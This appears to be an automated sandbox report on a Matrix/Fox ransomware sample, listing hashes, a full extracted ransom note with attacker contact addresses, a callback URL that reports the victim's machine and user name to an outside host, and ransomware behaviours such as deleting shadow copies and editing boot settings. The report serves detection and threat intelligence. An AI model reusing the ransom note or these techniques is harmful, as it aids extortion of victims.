matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
149s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
03-04-2024 17:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Size

1.2MB
MD5

76b640aa00354e46b29ca7ac2adfd732
SHA1

afebf9d72ba7186afefebf4deda87675621b0b8b
SHA256

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
SHA512

fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
SSDEEP

24576:l/SA+2lraRrjSJR5ezmT1dM9tZBrPyvaNn:zXlabPyyN

Score

10^/10

matrix discovery evasion persistence ransomware upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#FOX_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 PabFox@protonmail.com \par FoxHelp@cock.li\par FoxHelp@tutanota.com\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 0220D303420C1C0E\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 0220D303420C1C0E\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 11ADMokV\cf0\f1\fs32\lang1049\par \par }

Emails

PabFox@protonmail.com

FoxHelp@cock.li\par

FoxHelp@tutanota.com\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

description	ioc	process
File created	C:\Program Files\Java\jre7\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Library\Analysis\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
HTTP URL	3	http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=IZKCKOTP\|Admin&sid=Zp2laqYgI1DcqJmC&phase=START
File created	C:\Users\Admin\Favorites\Links\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Google\Chrome\Application\SetupMetrics\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\cmm\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Library\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\Admin\Contacts\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Microsoft Help\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1036\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Microsoft\Assistance\Client\1.0\ja-JP\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Mozilla Firefox\defaults\pref\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Stationery\1033\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\skins\fonts\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2192 bcdedit.exe
4828 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 2712 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

nt7HdeS164.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS nt7HdeS164.exe

pid	process
2192	bcdedit.exe
4828	bcdedit.exe

flow	pid	process
9	2712	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	nt7HdeS164.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

nt7HdeS164.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	nt7HdeS164.exe

Executes dropped EXE 3 IoCs

Processes:

NWtN47iM.exent7HdeS1.exent7HdeS164.exe

pid process

2464 NWtN47iM.exe
3388 nt7HdeS1.exe
4796 nt7HdeS164.exe

pid	process
2464	NWtN47iM.exe
3388	nt7HdeS1.exe
4796	nt7HdeS164.exe

Loads dropped DLL 4 IoCs

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.execmd.exent7HdeS1.exe

pid	process
2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
3700	cmd.exe
3388	nt7HdeS1.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

3904 takeown.exe

pid	process
3904	takeown.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nt7HdeS1.exe	upx
behavioral3/memory/3388-4826-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exent7HdeS164.exe

description	ioc	process
File opened (read-only)	\??\S:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\Q:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\J:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\G:	nt7HdeS164.exe
File opened (read-only)	\??\J:	nt7HdeS164.exe
File opened (read-only)	\??\M:	nt7HdeS164.exe
File opened (read-only)	\??\X:	nt7HdeS164.exe
File opened (read-only)	\??\E:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\Z:	nt7HdeS164.exe
File opened (read-only)	\??\O:	nt7HdeS164.exe
File opened (read-only)	\??\Z:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\V:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\N:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\M:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\K:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\E:	nt7HdeS164.exe
File opened (read-only)	\??\N:	nt7HdeS164.exe
File opened (read-only)	\??\R:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\O:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\G:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\U:	nt7HdeS164.exe
File opened (read-only)	\??\W:	nt7HdeS164.exe
File opened (read-only)	\??\T:	nt7HdeS164.exe
File opened (read-only)	\??\Y:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\X:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
